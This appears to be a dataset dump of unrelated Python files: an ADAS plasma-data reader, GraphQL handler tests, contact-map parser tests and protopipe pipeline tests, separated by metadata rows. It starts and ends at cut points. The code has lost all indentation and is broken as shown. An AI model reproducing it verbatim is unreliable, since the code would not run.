:type data: list[str]
:param i: first line to look at (index of data)
:type i: int
:param array: array where to add the data from the file (should be of the \
good size)
:type array: np.array
:param n: Number of item contained inside the data
:type n: int
:returns: index of the line following the block
:rtype: int
"""
# loop over all the data block
index = 0
while index != n:
temp = data[i].split()
# loop over one line, taking all the data
# it contains
for j in range(len(temp)):
array[index] = temp[j]
index += 1
i += 1
return i
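A standalone replica of this block-reading loop (with made-up test data, and an explicit `float()` cast instead of NumPy's implicit string conversion) shows how values spread over several lines fill the target array and how the index of the next unread line is returned:

```python
def read_block(data, i, array, n):
    # fill `array` with n whitespace-separated values, starting at line i
    index = 0
    while index != n:
        for value in data[i].split():
            array[index] = float(value)
            index += 1
        i += 1
    return i

lines = ["1.0 2.0 3.0", "4.0 5.0"]
out = [0.0] * 5
next_line = read_block(lines, 0, out, 5)
# both lines were consumed, so the next line to read is index 2
```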
class ADAS21(ADAS_file):
""" Class containing all the data from one ADAS file (adf21)
The data contained in this kind of file is the beam stopping coefficient.
The beam energy is divided by the atomic mass of the beam particles (eV/amu).
:param name: Name of the ADAS file
:type name: str
:ivar int n_b: Size of the beam energy dimension
:ivar int n_density: Size of the density dimension
:ivar float T_ref: Reference temperature (eV)
:ivar np.array[n_b] adas_beam: Beam energies considered (eV/amu)
:ivar np.array[n_density] densities: Densities considered (m :sup:`-3`)
:ivar np.array[n_density,n_b] coef_dens: Beam stopping coefficient as a function\
of the density and the beam energy (m :sup:`3`/s)
:ivar int n_T: Size of the temperature dimension
:ivar float E_ref: Reference beam energy (eV/amu)
:ivar float dens_ref: Reference density (m :sup:`-3`)
:ivar np.array[n_T] temperature: Temperatures considered (eV)
:ivar np.array[n_T] coef_T: Beam stopping coefficient as a function of the temperature (m :sup:`3`/s)
"""
def __init__(self,name):
""" Read the file and store all the values.
:param name: Name of the ADAS file
:type name: str
"""
super(ADAS21, self).__init__(name)
# open the file and store all the text in data
f = open(self.name,'r')
data = f.read().split('\n')
f.close()
temp = data[2].split()
# number of different beams in the ADAS file
self.n_b = int(temp[0]) #! (this sign indicates an attribute)
# change of unit
# number of different densities for the target
self.n_density = int(temp[1]) #!
# reference temperature
self.T_ref = float(temp[2].split('=')[1]) #!
# list of all beams computed by ADAS
self.adas_beam = np.zeros(self.n_b) #!
# line number in the ADAS file
i = 4
# read all the beam energies taken into account in the
# ADAS file
i = self.read_block(data,i,self.adas_beam,self.n_b)
# same as before but with the densities
self.densities = np.zeros(self.n_density) #!
i = self.read_block(data,i,self.densities,self.n_density)
# change of unit cm-3 -> m-3
self.densities *= 100.0**3
i += 1 # remove line with ----
# contains the coefficients as a function of densities and the beam
# energies
self.coef_dens = np.zeros((self.n_density,self.n_b))
# coef_dens[i,j] -- i for densities, j for beam energies #!
for j in range(self.n_density):
i = self.read_block(data,i,self.coef_dens[j],self.n_b)
i += 1 # remove line with ----
# change of unit cm^3/s -> m^3/s
self.coef_dens /= 100.0**3
temp = data[i].split()
self.n_T = int(temp[0]) # number of different temperatures #!
# reference energy
self.E_ref = float(temp[1].split('=')[1]) #!
# reference density
self.dens_ref = float(temp[2].split('=')[1])*100**3 #!
i += 2 # goes to next line, and remove line with ----
# list of temperature
self.temperature = np.zeros(self.n_T) #!
i = self.read_block(data,i,self.temperature,self.n_T)
i += 1 # remove line with ----
# read the coefficients as a function of the temperature
self.coef_T = np.zeros(self.n_T) #!
i = self.read_block(data,i,self.coef_T,self.n_T)
# change of unit
self.coef_T /= 100.0**3
# END OF READING
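The reader above converts every CGS quantity from the ADAS file to SI: densities go from cm⁻³ to m⁻³ (multiply by 100³) and rate coefficients from cm³/s to m³/s (divide by 100³). A hedged sketch with made-up values:

```python
# ADAS stores densities in cm^-3; the reader converts to m^-3
density_cm3 = 1.0e13
density_m3 = density_cm3 * 100.0**3   # 1 cm^-3 = 1e6 m^-3

# rate coefficients come in cm^3/s and are converted to m^3/s
coef_cm3_s = 2.5e-8
coef_m3_s = coef_cm3_s / 100.0**3     # 1 cm^3 = 1e-6 m^3
```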
class ADAS22(ADAS_file):
""" Class containing all the data from one ADAS file (adf22)
The data contained in this kind of file is the emission coefficient.
The beam energy is divided by the atomic mass of the beam particles (eV/amu).
:param name: Name of the ADAS file
:type name: str
:ivar int n_b: Size of the beam energy dimension
:ivar int n_density: Size of the density dimension
:ivar float T_ref: Reference temperature (eV)
:ivar np.array[n_b] adas_beam: Beam energies considered (eV/amu)
:ivar np.array[n_density] densities: Densities considered (m :sup:`-3`)
:ivar np.array[n_density,n_b] coef_dens: Emission coefficient as a function\
of the density and the beam energy (m :sup:`3`/s)
:ivar int n_T: Size of the temperature dimension
:ivar float E_ref: Reference beam energy (eV/amu)
:ivar float dens_ref: Reference density (m :sup:`-3`)
:ivar np.array[n_T] temperature: Temperatures considered (eV)
:ivar np.array[n_T] coef_T: Emission coefficient as a function of the temperature (m :sup:`3`/s)
"""
def __init__(self,name):
""" Read the file and store everything as attributes
Arguments:
name -- name of the file
"""
super(ADAS22, self).__init__(name)
# open the file and store all the text in data
f = open(self.name,'r')
data = f.read().split('\n')
f.close()
temp = data[2].split()
# number of different beams in the ADAS file
self.n_b = int(temp[0]) #! (this sign indicates an attribute)
# change of unit
# number of different densities for the target
self.n_density = int(temp[1]) #!
# reference temperature
self.T_ref = float(temp[2].split('=')[1]) #!
# list of all beams computed by ADAS
self.adas_beam = np.zeros(self.n_b) #!
# line number in the ADAS file
i = 4
# read all the beam energies taken into account in the
# ADAS file
i = self.read_block(data,i,self.adas_beam,self.n_b)
# same as before but with the densities
self.densities = np.zeros(self.n_density) #!
i = self.read_block(data,i,self.densities,self.n_density)
# change of unit cm-3 -> m-3
self.densities *= 100.0**3
i += 1 # remove line with ----
# contains the coefficients as a function of densities and the beam
# energies
self.coef_dens = np.zeros((self.n_density,self.n_b))
# coef_dens[i,j] -- i for densities, j for beam energies #!
for j in range(self.n_density):
i = self.read_block(data,i,self.coef_dens[j],self.n_b)
i += 1 # remove line with ----
# change of unit cm^3/s -> m^3/s
self.coef_dens /= 100.0**3
temp = data[i].split()
self.n_T = int(temp[0]) # number of different temperatures #!
# reference energy
self.E_ref = float(temp[1].split('=')[1]) #!
# reference density
self.dens_ref = float(temp[2].split('=')[1])*100**3 #!
i += 2 # goes to next line, and remove line with ----
# list of temperature
self.temperature = np.zeros(self.n_T) #!
i = self.read_block(data,i,self.temperature,self.n_T)
i += 1 # remove line with ----
# read the coefficients as a function of the temperature
self.coef_T = np.zeros(self.n_T) #!
i = self.read_block(data,i,self.coef_T,self.n_T)
# change of unit
self.coef_T /= 100.0**3
# END OF READING
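`ADAS22.__init__` repeats the adf21 parsing line for line; since the two file layouts are identical, the duplication could be removed by having the adf22 reader inherit the parser. A hedged refactor sketch with stand-in class names (not the module's actual API):

```python
class Adf21Reader:
    """Stand-in for ADAS21: parses the layout shared by adf21 and adf22."""
    def __init__(self, name):
        self.name = name
        self._parse()

    def _parse(self):
        # the shared block-reading and unit-conversion logic would live here
        self.parsed = True

class Adf22Reader(Adf21Reader):
    """Stand-in for ADAS22: same layout, so it only inherits the parser."""
    pass

reader = Adf22Reader("emission.adf22")
```

The docstrings would still differ (beam stopping vs. emission coefficient), but the parsing code would exist once.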
| 36.708812 | 132 | 0.579793 | 1,400 | 9,581 | 3.880714 | 0.128571 | 0.027609 | 0.026321 | 0.022087 | 0.787778 | 0.787778 | 0.782809 | 0.771029 | 0.766611 | 0.766611 | 0 | 0.014787 | 0.322409 | 9,581 | 260 | 133 | 36.85 | 0.822089 | 0.541488 | 0 | 0.8125 | 0 | 0 | 0.003084 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0 | 0.025 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
62edaa1e325beae4fabc588cf1cdc99434e8b794 | 120 | py | Python | csgoinvshuffle/__init__.py | kreyoo/csgo-inv-shuffle | 6392dd1eef1ca87ec25c9cf4845af3f8df3594a5 | [
"MIT"
] | null | null | null | csgoinvshuffle/__init__.py | kreyoo/csgo-inv-shuffle | 6392dd1eef1ca87ec25c9cf4845af3f8df3594a5 | [
"MIT"
] | 5 | 2021-12-22T19:25:51.000Z | 2022-03-28T19:27:34.000Z | csgoinvshuffle/__init__.py | kreyoo/csgo-inv-shuffle | 6392dd1eef1ca87ec25c9cf4845af3f8df3594a5 | [
"MIT"
] | null | null | null | # flake8: noqa
from csgoinvshuffle.shuffle import ShuffleConfig
from csgoinvshuffle.inventory import get_inventory
| 24 | 51 | 0.833333 | 13 | 120 | 7.615385 | 0.692308 | 0.363636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009615 | 0.133333 | 120 | 4 | 52 | 30 | 0.942308 | 0.1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
1a02a187fddf59fcbd0886d14177835d9bc97547 | 5,290 | py | Python | tests/integration/test_handlers.py | singingwolfboy/tartiflette-aiohttp | c805ef37a6ba7182f59fa9555fce5f0154e13dd5 | [
"MIT"
] | 40 | 2019-05-28T04:24:45.000Z | 2021-12-26T10:04:11.000Z | tests/integration/test_handlers.py | singingwolfboy/tartiflette-aiohttp | c805ef37a6ba7182f59fa9555fce5f0154e13dd5 | [
"MIT"
] | 116 | 2019-06-19T18:39:11.000Z | 2022-03-28T07:06:24.000Z | tests/integration/test_handlers.py | singingwolfboy/tartiflette-aiohttp | c805ef37a6ba7182f59fa9555fce5f0154e13dd5 | [
"MIT"
] | 7 | 2020-01-25T12:06:59.000Z | 2021-11-08T15:39:22.000Z | try:
from contextlib import asynccontextmanager # Python 3.7+
except ImportError:
from async_generator import asynccontextmanager # Python 3.6
from functools import partial
from unittest.mock import Mock
import pytest
from tartiflette_aiohttp import default_context_factory
def prepare_response(_, data, __):
return data
@pytest.mark.asyncio
async def test_handler__handle_query__context_unicity():
from tartiflette import Resolver, create_engine
from tartiflette_aiohttp._handler import Handlers
@Resolver(
"Query.hello",
schema_name="test_handler__handle_query__context_unicity",
)
async def resolver_hello(parent, args, ctx, info):
try:
ctx["counter"] += 1
except KeyError:
ctx["counter"] = 1
return "hello " + str(ctx["counter"])
tftt_engine = await create_engine(
"""
type Query {
hello(name: String): String
}
""",
schema_name="test_handler__handle_query__context_unicity",
)
a_req = Mock()
a_req.app = {
"ttftt_engine": tftt_engine,
"response_formatter": prepare_response,
}
context_factory = partial(default_context_factory, {})
async def _get_param(*_, **__):
return ('query { hello(name: "Chuck") }', None, None)
await Handlers._handle(_get_param, a_req, context_factory)
await Handlers._handle(_get_param, a_req, context_factory)
b_response = await Handlers._handle(_get_param, a_req, context_factory)
assert b_response == {"data": {"hello": "hello 1"}}
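The test relies on `partial(default_context_factory, {})` binding one shared base dict as the factory's first argument, so every call builds on the same context object. A self-contained sketch of that binding pattern (the factory here is a made-up stand-in, not tartiflette-aiohttp's actual implementation):

```python
from functools import partial

def context_factory(base_context, req):
    # merge a fixed base context with per-request data
    return {**base_context, "req": req}

# partial() pins the first positional argument to one shared dict
factory = partial(context_factory, {"app": "demo"})
ctx = factory("request-1")
```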
@pytest.mark.asyncio
async def test_handler__handle_query__context_manager_as_factory():
from tartiflette import Resolver, create_engine
from tartiflette_aiohttp._handler import Handlers
@Resolver(
"Query.hello",
schema_name="test_handler__handle_query__context_manager_as_factory",
)
async def resolver_hello(parent, args, ctx, info):
return "hello " + ", ".join(ctx.keys())
tftt_engine = await create_engine(
"""
type Query {
hello(name: String): String
}
""",
schema_name="test_handler__handle_query__context_manager_as_factory",
)
req = Mock()
req.app = {
"ttftt_engine": tftt_engine,
"response_formatter": prepare_response,
}
@asynccontextmanager
async def custom_context_factory(context, req):
context["entered"] = True
yield context
context["exited"] = True
context = {}
context_factory = partial(custom_context_factory, context)
async def _get_param(*_, **__):
return ('query { hello(name: "Chuck") }', None, None)
response = await Handlers._handle(_get_param, req, context_factory)
assert context.get("entered")
assert context.get("exited")
assert response == {"data": {"hello": "hello entered"}}
@pytest.mark.asyncio
async def test_handler__handle_query__operation_name():
from tartiflette import Resolver, create_engine
from tartiflette_aiohttp._handler import Handlers
@Resolver(
"Query.hello", schema_name="test_handler__handle_query__operation_name"
)
async def resolver_hello(parent, args, ctx, info):
return "hello " + args["name"]
tftt_engine = await create_engine(
"""
type Query {
hello(name: String): String
}
""",
schema_name="test_handler__handle_query__operation_name",
)
a_req = Mock()
a_req.app = {
"ttftt_engine": tftt_engine,
"response_formatter": prepare_response,
}
context_factory = partial(default_context_factory, {})
async def _get_param(*_, **__):
return (
"""
query A { hello(name: "Foo") }
query B { hello(name: "Bar") }
query C { hello(name: "Baz") }
""",
None,
"B",
)
result = await Handlers._handle(
_get_param,
a_req,
context_factory,
)
assert result == {"data": {"hello": "hello Bar"}}
@pytest.mark.asyncio
async def test_handler__handle_query__prepare_response_is_called():
from tartiflette import Resolver, create_engine
from tartiflette_aiohttp._handler import Handlers
@Resolver(
"Query.hello",
schema_name="test_handler__handle_query__prepare_response_is_called",
)
async def resolver_hello(parent, args, ctx, info):
return "hello " + ", ".join(ctx.keys())
tftt_engine = await create_engine(
"""
type Query {
hello(name: String): String
}
""",
schema_name="test_handler__handle_query__prepare_response_is_called",
)
req = Mock()
req.app = {
"ttftt_engine": tftt_engine,
"response_formatter": Mock(side_effect=prepare_response),
}
@asynccontextmanager
async def custom_context_factory(context, req):
yield context
context = {}
context_factory = partial(custom_context_factory, context)
async def _get_param(*_, **__):
return ('query { hello(name: "Chuck") }', None, None)
response = await Handlers._handle(_get_param, req, context_factory)
assert req.app["response_formatter"].called
| 27.128205 | 79 | 0.643856 | 579 | 5,290 | 5.495682 | 0.143351 | 0.074796 | 0.064111 | 0.082967 | 0.808297 | 0.808297 | 0.799497 | 0.799497 | 0.762728 | 0.704903 | 0 | 0.00177 | 0.252552 | 5,290 | 194 | 80 | 27.268041 | 0.802984 | 0.004159 | 0 | 0.572519 | 0 | 0 | 0.166352 | 0.080872 | 0 | 0 | 0 | 0 | 0.045802 | 1 | 0.007634 | false | 0 | 0.114504 | 0.007634 | 0.19084 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
1a165df035c59673db52d5bc54e80f81a1cbbf2f | 3,767 | py | Python | conkit/io/tests/test_bbcontacts.py | mesdaghi/conkit | 01468761352bd3ac5078e5e9fef6f73c8c49036e | [
"BSD-3-Clause"
] | 12 | 2017-06-12T17:20:32.000Z | 2021-12-10T09:35:26.000Z | conkit/io/tests/test_bbcontacts.py | mesdaghi/conkit | 01468761352bd3ac5078e5e9fef6f73c8c49036e | [
"BSD-3-Clause"
] | 60 | 2017-02-08T19:29:34.000Z | 2022-03-17T16:00:54.000Z | conkit/io/tests/test_bbcontacts.py | mesdaghi/conkit | 01468761352bd3ac5078e5e9fef6f73c8c49036e | [
"BSD-3-Clause"
] | 12 | 2017-09-25T07:25:35.000Z | 2022-02-27T18:59:13.000Z | """Testing facility for conkit.io.Bbcontacts"""
__author__ = "Felix Simkovic"
__date__ = "26 Oct 2016"
import os
import unittest
from conkit.io.bbcontacts import BbcontactsParser
from conkit.io.tests.helpers import ParserTestCase
class TestBbcontactsParser(ParserTestCase):
def test_read_1(self):
content = """#identifier diversity direction viterbiscore indexpred state res1 res2
1EAZ 0.65 Antiparallel 9.860725 1 first 29 24
1EAZ 0.65 Antiparallel 9.860725 1 internal 30 23
1EAZ 0.65 Antiparallel 9.860725 1 last 31 22
1EAZ 0.65 Parallel -6.855870 29 first 87 54
1EAZ 0.65 Parallel -6.855870 29 internal 88 55
1EAZ 0.65 Parallel -6.855870 29 last 89 56
"""
f_name = self.tempfile(content=content)
with open(f_name, "r") as f_in:
contact_file = BbcontactsParser().read(f_in)
contact_map1 = contact_file.top_map
self.assertEqual(1, len(contact_file))
self.assertEqual(6, len(contact_map1))
self.assertEqual([24, 23, 22, 54, 55, 56], [c.res1_seq for c in contact_map1])
self.assertEqual([29, 30, 31, 87, 88, 89], [c.res2_seq for c in contact_map1])
self.assertEqual(
sorted([9.860725, 9.860725, 9.860725, -6.855870, -6.855870, -6.855870]),
sorted([c.raw_score for c in contact_map1]),
)
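Each bbcontacts record in the fixtures above is one whitespace-delimited line; splitting it recovers the fields the assertions inspect (`res1_seq`, `res2_seq`, `raw_score`). A standalone sketch of that column layout, not the parser's actual code:

```python
# identifier  diversity  direction  viterbiscore  indexpred  state  res1  res2
line = "1EAZ     0.65 Antiparallel      9.860725     1 first    29    24"
identifier, diversity, direction, score, index, state, res1, res2 = line.split()
```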
def test_read_2(self):
content = """#identifier diversity direction viterbiscore indexpred state res1 res2
1EAZ 0.65 Antiparallel 9.860725 1 first 29 24
1EAZ 0.65 Antiparallel 9.860725 1 last 30 23
1EAZ 0.65 Parallel -6.855870 29 first 87 54
"""
f_name = self.tempfile(content=content)
with open(f_name, "r") as f_in:
contact_file = BbcontactsParser().read(f_in, del_one_two=True)
contact_map1 = contact_file.top_map
self.assertEqual(1, len(contact_file))
self.assertEqual(0, len(contact_map1))
def test_read_3(self):
content = """#identifier diversity direction viterbiscore indexpred state res1 res2
1EAZ 0.65 Antiparallel 9.860725 1 first 29 24
1EAZ 0.65 Antiparallel 9.860725 1 internal 30 23
1EAZ 0.65 Antiparallel 9.860725 1 last 31 22
1EAZ 0.65 Parallel -6.855870 29 first 87 54
1EAZ 0.65 Parallel -6.855870 29 internal 88 55
1EAZ 0.65 Parallel -6.855870 29 last 89 56
1EAZ 0.65 Antiparallel 0.000000 1 first 100 24
1EAZ 0.65 Antiparallel 0.000000 1 last 101 23
1EAZ 0.65 Parallel 0.000000 29 first 100 15
"""
f_name = self.tempfile(content=content)
with open(f_name, "r") as f_in:
contact_file = BbcontactsParser().read(f_in, del_one_two=False)
contact_map1 = contact_file.top_map
self.assertEqual(1, len(contact_file))
self.assertEqual(9, len(contact_map1))
self.assertEqual([24, 23, 22, 54, 55, 56, 24, 23, 15], [c.res1_seq for c in contact_map1])
self.assertEqual([29, 30, 31, 87, 88, 89, 100, 101, 100], [c.res2_seq for c in contact_map1])
self.assertEqual(
sorted([9.860725, 9.860725, 9.860725, -6.855870, -6.855870, -6.855870, 0.0, 0.0, 0.0]),
sorted([c.raw_score for c in contact_map1]),
)
if __name__ == "__main__":
unittest.main(verbosity=2)
| 48.922078 | 104 | 0.575259 | 508 | 3,767 | 4.13189 | 0.187008 | 0.042878 | 0.060029 | 0.090519 | 0.844212 | 0.814674 | 0.814674 | 0.788947 | 0.787041 | 0.756551 | 0 | 0.196393 | 0.337669 | 3,767 | 76 | 105 | 49.565789 | 0.64489 | 0.010884 | 0 | 0.545455 | 0 | 0 | 0.45 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 1 | 0.045455 | false | 0 | 0.060606 | 0 | 0.121212 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a7e1d0a60216acb1aae2a0ac9b9d5edaddc8bd81 | 45 | py | Python | api/models/__init__.py | pythonkr/pyconkr-api | 077e122a0af37122c5b424870cf91b8fca91a9f5 | [
"Apache-2.0"
] | 25 | 2018-12-09T07:56:16.000Z | 2020-12-24T08:20:41.000Z | api/models/__init__.py | pythonkr/pyconkr-api | 077e122a0af37122c5b424870cf91b8fca91a9f5 | [
"Apache-2.0"
] | 100 | 2018-12-13T02:01:42.000Z | 2022-03-11T23:40:25.000Z | api/models/__init__.py | pythonkr/pyconkr-api | 077e122a0af37122c5b424870cf91b8fca91a9f5 | [
"Apache-2.0"
] | 8 | 2019-01-05T05:02:27.000Z | 2019-08-09T08:14:49.000Z | from .program import *
from .review import *
| 15 | 22 | 0.733333 | 6 | 45 | 5.5 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.177778 | 45 | 2 | 23 | 22.5 | 0.891892 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c50cf38641274a902d4599be0f8fdc911694bf87 | 87 | py | Python | Algorithm/__init__.py | Errare-humanum-est/ProtoGen | e8701dbfabb9c5148abc649fc76c5095d9cc4f9f | [
"MIT"
] | 13 | 2018-06-10T07:14:31.000Z | 2022-01-06T20:44:16.000Z | Algorithm/__init__.py | Errare-humanum-est/ProtoGen | e8701dbfabb9c5148abc649fc76c5095d9cc4f9f | [
"MIT"
] | 1 | 2018-06-12T15:03:12.000Z | 2018-06-12T15:03:12.000Z | Algorithm/__init__.py | icsa-caps/ProtoGen | 639c62947314c427661cb66ebc3ac7e26798fc7e | [
"MIT"
] | 5 | 2018-06-12T14:45:38.000Z | 2021-03-20T06:29:25.000Z | import Algorithm.ProtoAlgorithm
import Algorithm.ProtoConfig
import Algorithm.TraceNode | 29 | 31 | 0.908046 | 9 | 87 | 8.777778 | 0.555556 | 0.56962 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057471 | 87 | 3 | 32 | 29 | 0.963415 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c550fa64c0093e0973cd67a8294ff679fcb503b3 | 66 | py | Python | img2bw/__init__.py | salvacarrion/img2bw | 4228bdd0020b7e6ec48b6b1132602505e7f622ee | [
"MIT"
] | 3 | 2020-07-16T08:40:31.000Z | 2022-01-07T14:05:58.000Z | img2bw/__init__.py | salvacarrion/img2bw | 4228bdd0020b7e6ec48b6b1132602505e7f622ee | [
"MIT"
] | 1 | 2021-06-24T05:14:43.000Z | 2021-06-24T05:14:43.000Z | img2bw/__init__.py | salvacarrion/img2bw | 4228bdd0020b7e6ec48b6b1132602505e7f622ee | [
"MIT"
] | 1 | 2021-08-10T04:58:14.000Z | 2021-08-10T04:58:14.000Z | from .main import *
from .binarizer import *
from .utils import *
| 16.5 | 24 | 0.727273 | 9 | 66 | 5.333333 | 0.555556 | 0.416667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 66 | 3 | 25 | 22 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c5558943a964ccce17d3367746199a99a3beaed2 | 15,945 | py | Python | protopipe/scripts/tests/test_pipeline.py | Iburelli/protopipe | 1f392ea5abca6b09b684fca1e4ff3b138faa0b5a | [
"CECILL-B"
] | null | null | null | protopipe/scripts/tests/test_pipeline.py | Iburelli/protopipe | 1f392ea5abca6b09b684fca1e4ff3b138faa0b5a | [
"CECILL-B"
] | null | null | null | protopipe/scripts/tests/test_pipeline.py | Iburelli/protopipe | 1f392ea5abca6b09b684fca1e4ff3b138faa0b5a | [
"CECILL-B"
] | null | null | null | from pathlib import Path
from os import system
from pkg_resources import resource_filename
import tables
import pytest
from ctapipe.utils.datasets import get_dataset_path
from protopipe.scripts import (
data_training,
build_model,
write_dl2,
make_performance_EventDisplay,
)
# PROD 3B
# CONFIG FILES
config_prod3b_CTAN = resource_filename(
"protopipe", "scripts/tests/test_config_analysis_north.yaml"
)
config_prod3b_CTAS = resource_filename(
"protopipe", "scripts/tests/test_config_analysis_south.yaml"
)
config_AdaBoostRegressor = resource_filename(
"protopipe", "scripts/tests/test_AdaBoostRegressor.yaml"
)
config_RandomForestRegressor = resource_filename(
"protopipe", "scripts/tests/test_RandomForestRegressor.yaml"
)
config_RandomForestClassifier = resource_filename(
"protopipe", "scripts/tests/test_RandomForestClassifier.yaml"
)
config_DL3_ED_prod3b = resource_filename(
"protopipe", "scripts/tests/test_performance_ED_prod3b.yaml"
)
# TEST FILES
URL_TEST_DATA = "http://cccta-dataserver.in2p3.fr/data/protopipe/testData/"
URL_PROD3B_CTAN = f"{URL_TEST_DATA}/prod3_laPalma_baseline_Az180_Zd20"
URL_PROD3B_CTAS = f"{URL_TEST_DATA}/prod3_Paranal_baseline_Az180_Zd20"
input_data = {
"PROD3B_CTA_NORTH": {
"config": config_prod3b_CTAN,
"gamma1": get_dataset_path("gamma1.simtel.gz", url=f"{URL_PROD3B_CTAN}"),
"gamma2": get_dataset_path("gamma2.simtel.gz", url=f"{URL_PROD3B_CTAN}"),
"gamma3": get_dataset_path("gamma3.simtel.gz", url=f"{URL_PROD3B_CTAN}"),
"proton1": get_dataset_path("proton1.simtel.gz", url=f"{URL_PROD3B_CTAN}"),
"proton2": get_dataset_path("proton2.simtel.gz", url=f"{URL_PROD3B_CTAN}"),
"electron1": get_dataset_path("electron1.simtel.gz", url=f"{URL_PROD3B_CTAN}"),
},
"PROD3B_CTA_SOUTH": {
"config": config_prod3b_CTAS,
"gamma1": get_dataset_path("gamma1.simtel.gz", url=f"{URL_PROD3B_CTAS}"),
"gamma2": get_dataset_path("gamma2.simtel.gz", url=f"{URL_PROD3B_CTAS}"),
"gamma3": get_dataset_path("gamma3.simtel.gz", url=f"{URL_PROD3B_CTAS}"),
"proton1": get_dataset_path("proton1.simtel.gz", url=f"{URL_PROD3B_CTAS}"),
"proton2": get_dataset_path("proton2.simtel.gz", url=f"{URL_PROD3B_CTAS}"),
"electron1": get_dataset_path("electron1.simtel.gz", url=f"{URL_PROD3B_CTAS}"),
},
}
@pytest.mark.parametrize("test_case", ["PROD3B_CTA_NORTH", "PROD3B_CTA_SOUTH"])
def test_GET_GAMMAS_FOR_ENERGY_MODEL_WITH_IMAGES(test_case, pipeline_testdir):
outpath = pipeline_testdir / f"test_training_withImages_{test_case}.h5"
command = f"python {data_training.__file__}\
--config_file {input_data[test_case]['config']}\
-o {outpath}\
--save_images\
-i {input_data[test_case]['gamma1'].parent}\
-f {input_data[test_case]['gamma1'].name}"
print( # only with "pytest -s"
f"""
You can reproduce this test by running the following command,
{command}
"""
)
exit_status = system(command)
# check that the script ends without crashing
assert exit_status == 0
# check that the produced HDF5 file is non-empty
with tables.open_file(outpath) as file:
assert file.get_filesize() > 0
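Every test in this suite shells out with `os.system` and treats a zero wait status as success. A minimal self-contained sketch of that convention, using throwaway inline commands:

```python
import sys
from os import system

# a command that exits 0 yields wait status 0; a failing one does not
ok = system(f'"{sys.executable}" -c "import sys; sys.exit(0)"')
bad = system(f'"{sys.executable}" -c "import sys; sys.exit(1)"')
```

On POSIX the non-zero value is the raw wait status (e.g. 256 for exit code 1), so the tests only ever compare against 0.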
@pytest.mark.parametrize(
"test_case",
[
pytest.param("PROD3B_CTA_NORTH", marks=pytest.mark.dependency(name="g1N")),
pytest.param("PROD3B_CTA_SOUTH", marks=pytest.mark.dependency(name="g1S")),
],
)
def test_GET_GAMMAS_FOR_ENERGY_MODEL(test_case, pipeline_testdir):
outpath = pipeline_testdir / f"test_gamma1_noImages_{test_case}.h5"
command = f"python {data_training.__file__}\
--config_file {input_data[test_case]['config']}\
-o {outpath}\
-i {input_data[test_case]['gamma1'].parent}\
-f {input_data[test_case]['gamma1'].name}"
print( # only with "pytest -s"
f"""
You can reproduce this test by running the following command,
{command}
"""
)
exit_status = system(command)
# check that the script ends without crashing
assert exit_status == 0
# sanity checks on the produced HDF5 file
with tables.open_file(outpath) as file:
assert file.get_filesize() > 0
assert file.root._v_attrs["status"] == "complete"
@pytest.mark.parametrize(
"test_case",
[
pytest.param(
"PROD3B_CTA_NORTH",
marks=pytest.mark.dependency(name="EN_1", depends=["g1N"]),
),
pytest.param(
"PROD3B_CTA_SOUTH",
marks=pytest.mark.dependency(name="ES_1", depends=["g1S"]),
),
],
)
def test_BUILD_ENERGY_MODEL_AdaBoost_DecisionTreeRegressor(test_case, pipeline_testdir):
